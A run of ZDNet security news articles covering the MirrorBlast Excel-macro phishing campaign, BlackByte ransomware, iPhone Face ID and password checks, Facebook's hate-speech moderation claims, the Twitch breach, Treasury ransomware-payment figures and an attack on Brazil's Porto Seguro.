Information Technology

A new phishing campaign is targeting employees in financial services using links that download what is described as a ‘weaponized’ Excel document. The phishing campaign, dubbed MirrorBlast, was detected by security firm ET Labs in early September. Fellow security firm Morphisec has now analyzed the malware and notes the malicious Excel files could bypass malware-detection systems because it contains “extremely lightweight” embedded macros, making it “particularly dangerous” for organizations that depend on detection-based security and sandboxing. 

ZDNet Recommends

The best cyber insurance

The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.

Read More

Macros, scripts for automating tasks, have become a popular tool for cyberattackers. While macros are disabled in Excel by default, attackers use social engineering to trick potential victims into enabling macros. See also: This new ransomware encrypts your data and makes some nasty threats, too.Though seemingly a basic technique, macros have been used by state-sponsored hackers because they often work. Microsoft earlier this year expanded its Antimalware Scan Interface (AMSI) for antivirus to address the surge in macro malware and a new trend by attackers to use legacy Excel 4.0 XLM macros (instead of newer VBA macros) to bypass anti-malware systems.    According to Morphisec, the attack chain in MirrorBlast resembles techniques used by a well-established, financially motivated Russia-based cybercriminal group that’s tracked by researchers as TA505. The group has been active since at least 2014 and is known for the wide variety of tools they use. “TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution,” Morphisec researcher Arnold Osipov notes in a blogpost. 

While the MirrorBlast attack starts with a document attached to an email, it later uses a Google feedproxy URL with a SharePoint and OneDrive lure that poses as a file share request. Clicking the URL leads to a compromised SharePoint site or fake OneDrive site. Both versions lead to the weaponized Excel document.  The sample MirrorBlast email shows the attackers are exploiting the theme of company-issued information about COVID-related changes to working arrangements. 

Morphisec notes that the macro code can be executed only on a 32-bit version of Office due to compatibility reasons with ActiveX objects. The macro itself executes a JavaScript script designed to bypass sandboxing by checking if the computer is run in administrator mode. It then launches the msiexec.exe process, which downloads and installs an MSI package. See also: This new ransomware encrypts your data and makes some nasty threats, too.Morphisec found two variants of the MIS installer that used legitimate scripting tools called KiXtart and REBOL. The KiXtart script sends the victim’s machine information to the attacker’s command and control server, such as the domain, computer name, user name, and process list. It then responds with a number instructing whether to proceed with the Rebol variant. According to Morphisec, the Rebol script leads to a remote access tool called FlawedGrace, which has been used by the group in the past.”TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals,” Osipov notes.   More

A new form of malware found in a recent IT incident appears to have been inspired by other strains known to reap their operators’ huge financial rewards — but is likely the work of amateurs. 

Special feature

Cyberwar and the Future of Cybersecurity

Today’s security threats have expanded in scope and seriousness. There can now be millions — or even billions — of dollars at risk when information security isn’t handled properly.

Read More

Dubbed BlackByte and discovered by Trustwave, the Windows-based ransomware is considered “odd” due to some of the design and function decisions made by its creators.  In a set of technical advisories published last week (1,2), the cybersecurity firm says the malware only targets systems that are not based on Russian or ex-USSR languages — a common trend in ransomware believed to be of Russian origin. BlackByte has also taken advantage of what has become known as double-extortion in this space: not only does malware encrypt and lock up systems, but victims are also then faced with the threat of confidential information being leaked or sold online.  Modern ransomware operators, including Maze, ReEvil, Conti, and Babuk, run leak websites on the Dark Web for this purpose. BlackByte, too, has launched a website, but according to the researchers, the threat of data exfiltration and leaks is groundless — as the ransomware does not appear to have this functionality in the first place. As a result, more victims may pay up after infection, even if there is no actual risk of information becoming public.  BlackByte’s encryption process also reveals that unskilled threat actors may be at work. The malware downloads and executes the same key to encrypt files in AES, rather than unique keys for each session, such as those usually employed by sophisticated ransomware operators. 

If the key cannot be downloaded from its HTTP server — hidden in a file called forest.PNG — the ransomware program simply crashes. An RSA key is used once to encrypt the ‘raw’ key to show a ransom note.  “To decrypt a file, one only needs the raw key to be downloaded from the host,” Trustwave says. “As long as the .PNG file it downloaded remains the same, we can use the same key to decrypt the encrypted files.” Aside from this odd encryption process, the malware utilizes a JavaScript launcher designed to decrypt the main .NET DLL payload.  The ransomware is executed into memory, and a victim ID is assigned using the vulnerable PC’s processor ID and volume serial number, which are then hashed and pinged to the malware’s command-and-control (C2) server. Any process which could prevent file encryption is terminated, and the SetThreadExecutionState API is used to stop the machine from entering a sleep state.  In addition, volume shadow copies are wiped, Windows restore points are deleted, and network discovery is enabled. BlackByte also has worm-like capabilities similar to those employed by Ryuk, and it will try to propagate itself across available networks.  Trustwave has made a BlackByte decryptor available for download at GitHub. Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

The other day I downloaded a new version of the iPhone or iPad security app iVerify, and it offered a new tip for securing your device that I’d not considered before. It involves Face ID and the fact that it can have more than just your face enrolled.Face ID offers a super-fast and convenient way to unlock modern iPhones and iPads, and it’s super secure.But it’s only as secure as your passcode. If someone secretly knows your passcode (maybe they’ve shoulder-surfed you to get it), they could add their face to your iPhone or iPad and could be unlocking your device with the same ease that you’re unlocking it.OK, so how do you tell if someone else’s face is enrolled with your Face ID?Must read: Check your iPhone for compromised passwords… NOW!Tap Settings > Face ID & Passcode and enter your passcode.

If you see the option to Set Up an Alternative Appearance, then there’s only one face enrolled, and you’re OK.Only one face enrolled in Face IDHowever, if that option is not visible, there are two faces enrolled (or perhaps you enrolled your face twice). If this is that case, and you’ve not set up your device so someone else can access it, tap on Reset Face ID and go through the enrollment process again (it takes seconds).Two faces enrolled in Face IDI also recommend — highly recommend — that you change your passcode. To do this tap Settings > Face ID & Passcode, and enter your passcode, and then tap Change Passcode.It’s quick to check and quick to fix. As to whose face was set up as the alternative appearance, there’s no way to know (unless you go pointing your locked iPhone at people and see if it unlocks) because the face isn’t stored, only a digital representation, and this is locked away in Apple’s Secure Enclave chip.I recommend installing iVerify. It’s a very handy security app that’s packed with information on how to make your iPhone or iPad more secure.

More iPhone More

Image: Facebook
Facebook integrity VP Guy Rosen has shut down claims that the AI technology it uses to fight hate speech is having little impact, saying it’s “not true”. Instead, he claimed the prevalence of hate speech on Facebook has been down by almost 50% in the last three quarters.”We don’t want to see hate on our platform, nor do our users or advertisers, and we are transparent about our work to remove it,” Rosen wrote in a blog post.”What these documents demonstrate is that our integrity work is a multi-year journey. While we will never be perfect, our teams continually work to develop our systems, identify issues and build solutions.”Rosen’s post was in response to a Wall Street Journal article that reported, based on leaked internal documents, the social media giant’s AI technology created to remove offensive content such as hate speech and violent images has had little success. The report pointed out that a team of Facebook employees in March estimated the AI systems were removing posts that generated 3% to 5% of the views of hate speech on the platform, and 0.6% of all content that violated the company’s policies against violence and incitement. However, Rosen said “focusing just on content removals is the wrong way to look at how we fight hate speech”. “That’s because using technology to remove hate speech is only one way we counter it. We need to be confident that something is hate speech before we remove it,” he said.

“If something might be hate speech but we’re not confident enough that it meets the bar for removal, our technology may reduce the content’s distribution or won’t recommend Groups, Pages, or people that regularly post content that is likely to violate our policies. We also use technology to flag content for more review.”Instead, he outlined that Facebook measures its success based on the prevalence of the hate speech people see on its platform, declaring its only five views per every 10,000 on its platform. “Prevalence tells us what violating content people see because we missed it. It’s how we most objectively evaluate our progress, as it provides the most complete picture,” he said.Rosen also took the opportunity to point out that the WSJ report “misconstrued” its proactive detection rate, another metric the company supposedly uses to tells how good its technology is at finding offensive content before people report it to the company.  “When we began reporting our metrics on hate speech, only 23.6% of content we removed was detected proactively by our systems; the majority of what we removed was found by people. Now, that number is over 97%,” Rosen claimed.Last month, Facebook said it made advancements to its AI used to help with content moderation, including introducing its Reinforcement Integrity Optimizer (RIO), which guides an AI model to learn directly from millions of current pieces of content to evaluate how well it was doing its job.  This blog post by Rosen is the latest statement issued by Facebook as it tries to dispel scathing claims about its operations. Earlier in the month, CEO Mark Zuckerberg publicly addressed allegations that the social media giant prioritises profit over safety and wellbeing, saying that also was “just not true”.”The argument that we deliberately push content that makes people angry for profit is deeply illogical,” he said.The response was after Facebook whistleblower Frances Haugen fronted the US Senate as part of its inquiry into Facebook’s operations, accusing the social media giant of intentionally hiding vital information from the public for profit. During her testimony, she labelled the company as “morally bankrupt” and casting “the choices being made inside of Facebook” as “disastrous for our children, our privacy, and our democracy”.Related Coverage More

Compromised passwords are a fast track to all sorts of online headaches. But thankfully iOS makes it quite easy to do a quick audit of your passwords for compromised passwords, allowing you to change them before problems escalate.And it’ll take you less than five minutes.Here’s how.Tap on Settings and go to Passwords. There, if you have compromised or reused passwords, you’ll see an entry called Security Recommendations. Security Recommendations in IOS 15Tap on that to see the accounts that have problems with the passwords, and you’ll get the chance to either change the password on the website or service, or delete the entry (only do this if you’ve already changed the password, ot it’s an old, obsolete account for a service you’ve deactivated).It’s quick.

It’s simple.For most people, they’re done in less than five minutes.But it can save you a whole heap of headaches.Note: The same trick will work for the iPad. On the Mac, fire up Safari, click on Safari in the menu bar and click Preferences… then go to Passwords, and if there are any security recommendations, you will see a notice at the bottom of the window.

ZDNet Recommends

Best security key 2021

While robust passwords go a long way to securing your valuable online accounts, hardware-based two-factor authentication takes that security to the next level.

Read More More

Twitch has come out with a new statement denying the severity of the breach that drew headlines earlier this month. The gaming platform reiterated that the incident was caused by a “server configuration change that allowed improper access by an unauthorized third party.”They claimed Twitch passwords were not exposed in the breach and said they are “confident” that the systems storing Twitch login credentials, which are hashed with bcrypt, were not accessed, nor were full credit card numbers or ACH/bank information. “The exposed data primarily contained documents from Twitch’s source code repository, as well as a subset of creator payout data. We’ve undergone a thorough review of the information included in the files exposed and are confident that it only affected a small fraction of users and the customer impact is minimal. We are contacting those who have been impacted directly,” the company said. An unknown hacker leaked the entirety of Twitch’s source code among a 128 GB trove of data released on October 6.The data included creator payouts going back to 2019, proprietary SDKs and internal AWS services used by Twitch, as well as all of the company’s internal cybersecurity red teaming tools.While much of the press attention initially focused on the eye-popping revenues brought in by certain Twitch streamers, concern over the privacy and security of all Twitch streamers began to grow in the days following the attack. 

Experts warned that all Twitch streamers needed to take immediate actions to protect their bank accounts and themselves from a potential wave of attacks by opportunistic cybercriminals. Twitch eventually announced that it was resetting all stream keys, directing streamers to this website for new stream keys.The unknown hacker behind the attack claimed it was because of the platform’s lackluster response to complaints about racism, homophobia and abuse directed toward minority gamers in what are called “hate raids.”The hacker said Twitch’s community is “a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories.”The original note said the initial release was only the first section of the stolen data. More

More than $5 billion in bitcoin transactions has been tied to the top ten ransomware variants, according to a report released by the US Treasury on Friday. The department’s Financial Crimes Enforcement Network (FinCen) and Office of Foreign Assets Control (OFAC) released two reports illustrating just how lucrative cybercrime related to ransomware has become for the gangs behind them. Parts of the report are based on suspicious activity reports (SAR) financial services firms filed to the US government.FinCen said the total value of suspicious activity reported in ransomware-related SARs during the first six months of 2021 was $590 million, which exceeds the $416 million reported for all of 2020.”FinCEN analysis of ransomware-related SARs filed during the first half of 2021 indicates that ransomware is an increasing threat to the US financial sector, businesses and the public. The number of ransomware-related SARs filed monthly has grown rapidly, with 635 SARs filed and 458 transactions reported between 1 January 2021 and 30 June 2021, up 30 percent from the total of 487 SARs filed for the entire 2020 calendar year,” the report said. Through analyzing 177 unique convertible virtual currency wallet addresses used for ransomware-related payments associated with the 10 most commonly-reported ransomware variants in SARs during the review period, the Treasury Department found about $5.2 billion in outgoing bitcoin transactions potentially tied to ransomware payments.”According to data generated from ransomware-related SARs, the mean average total monthly suspicious amount of ransomware transactions was $66.4 million and the median average was $45 million. FinCEN identified bitcoin as the most common ransomware-related payment method in reported transactions,” the report adds.FinCen noted that the US dollar figures are based on the value of bitcoin at the time of the transaction and added that the data set “consisted of 2,184 SARs reflecting $1.56 billion in suspicious activity filed between 1 January 2011 and 30 June 2021.”
FinCen

While the report does not say which ransomware variants made more than others, it does list the most commonly reported variants, which were REvil/Sodinokibi, Conti, DarkSide, Avaddon and Phobos. FinCen said it found a total of 68 different ransomware variants. Ransomware expert and Recorded Future computer emergency response team member Allan Liska told ZDNet that Phobos being in the top five is surprising. “Phobos tends to fall under the radar and doesn’t get a lot of attention, clearly more focus needs to be placed on it so organizations can better defend themselves against it,” Liska said.He added that it was interesting to see that FinCen has been tracking ransomware transactions since 2011, meaning they have a lot more experience tracking cryptocurrency transactions than ransomware groups realize.”I think we all suspected that ransomware attacks were on the rise this year, it is nice to see this confirmed,” he said. “Finally, in just the first 6 months of the year FinCEN identified 68 ransomware variants posted in SAR. Again, I don’t think most people realize just how diverse the ransomware ecosystem is.”The reports comes one day after the US officials and governments from more than 30 countries finished a two-day summit focused on ransomware and how it can be stopped. The countries pledged further cooperation and specifically mentioned the need to hold cryptocurrency platforms accountable. Coinciding with the release of the report, FinCen released further guidance effectively threatening the virtual currency industry with penalties if they allow sanctioned people or entities to continue to use their platforms.”OFAC sanctions compliance requirements apply to the virtual currency industry in the same manner as they do to traditional financial institutions, and there are civil and criminal penalties for failing to comply,” FinCen said on Friday. The FinCen report also noted that ransomware groups are increasingly using cryptocurrencies like Monero that are popular among those seeking anonymity and have avoided using wallets more than once.Mixing services are also widely used across the ransomware industry as a way to disrupt tracking experts and decentralized exchanges are being used to convert ransomware payments into other cryptocurrencies. The report also mentions “chain hopping,” a practice ransomware actors use to change one coin into another at least once before moving the funds to another service or platform. “This practice allows threat actors to convert illicit BTC proceeds into an AEC like XMR at CVC exchanges or services. Threat actors can then transfer the converted funds to large CVC services and MSBs with lax compliance programs,” FinCen said.  More

One of Brazil’s largest insurance groups, Porto Seguro has reported it suffered a cyberattack that resulted in instability to its service channels and some of its systems.The company reported the incident to the Securities and Exchange Commission (CVM) on Thursday (14), saying that it “promptly activated all security protocols” and that it has been gradually restoring its operating environment and working towards resuming normal business as soon as possible.Porto Seguro did not disclose any further details in relation to the type of attack it has suffered, but noted that so far, no data leakage had been identified in relation to the company, or its subsidiaries, customers or partners, including any personal data. Third largest insurance company in Brazil, Porto Seguro leads the car and residential insurance segments in Brazil and has around 10 million clients across its various business lines including credit provision. The company is headquartered in São Paulo, with subsidiaries in Brazil and Uruguay employing more than 13,000 staff.

The company is the latest of a list of major Brazilian organizations suffering major security incidents over recent weeks. Earlier this month, CVC, one of the country’s largest travel operators, was hit by a ransomware attack that brought its operations to a standstill. Since the attack, reported to CVM on October 2, the company has a banner on its website stating that it has been hit by a cyberattack and that it is “working diligently to mitigate the impact of the incident and ensure business continuity.” At the time of writing, the CVC’s investor relations page, where updates on the incident would have been published, was unavailable. Prior to CVC and Porto Seguro, other major companies in Brazil that were targeted by cybercriminals included retail chain Renner, victim of a ransomware attack that compromised its e-commerce platform for three days in August.

Security teams are in place in less than a third of Brazilian organizations, even though most businesses frequently suffer cyberattacks, according to research published by Datafolha Institute on behalf of Mastercard and published in June. Financial services, insurance, and technology and telecommunications are among the most prepared in terms of cybersecurity readiness, the study has found. Conversely, the education and healthcare sectors are the most vulnerable. According to a separate study, also carried out by Datafolha Institute and published in July, the fear of cyber attacks is high among Brazilian users. The research aimed at measuring the level of concern regarding the security of consumers within data and information exchange environments, and it found that only 13% of those polled consider their data to be very secure, while 21% consider their data to be insecure.In September, the banking sector started discussions with the Ministry of Justice around the creation of a strategy to address crime in digital environments. Goals under the strategy would include the expansion of the set-up around identifying and repressing actors responsible for cybercrimes, as well as the promotion of permanent cooperation between the public and private sectors on the matter and public awareness campaigns on cyber risks and fraud. More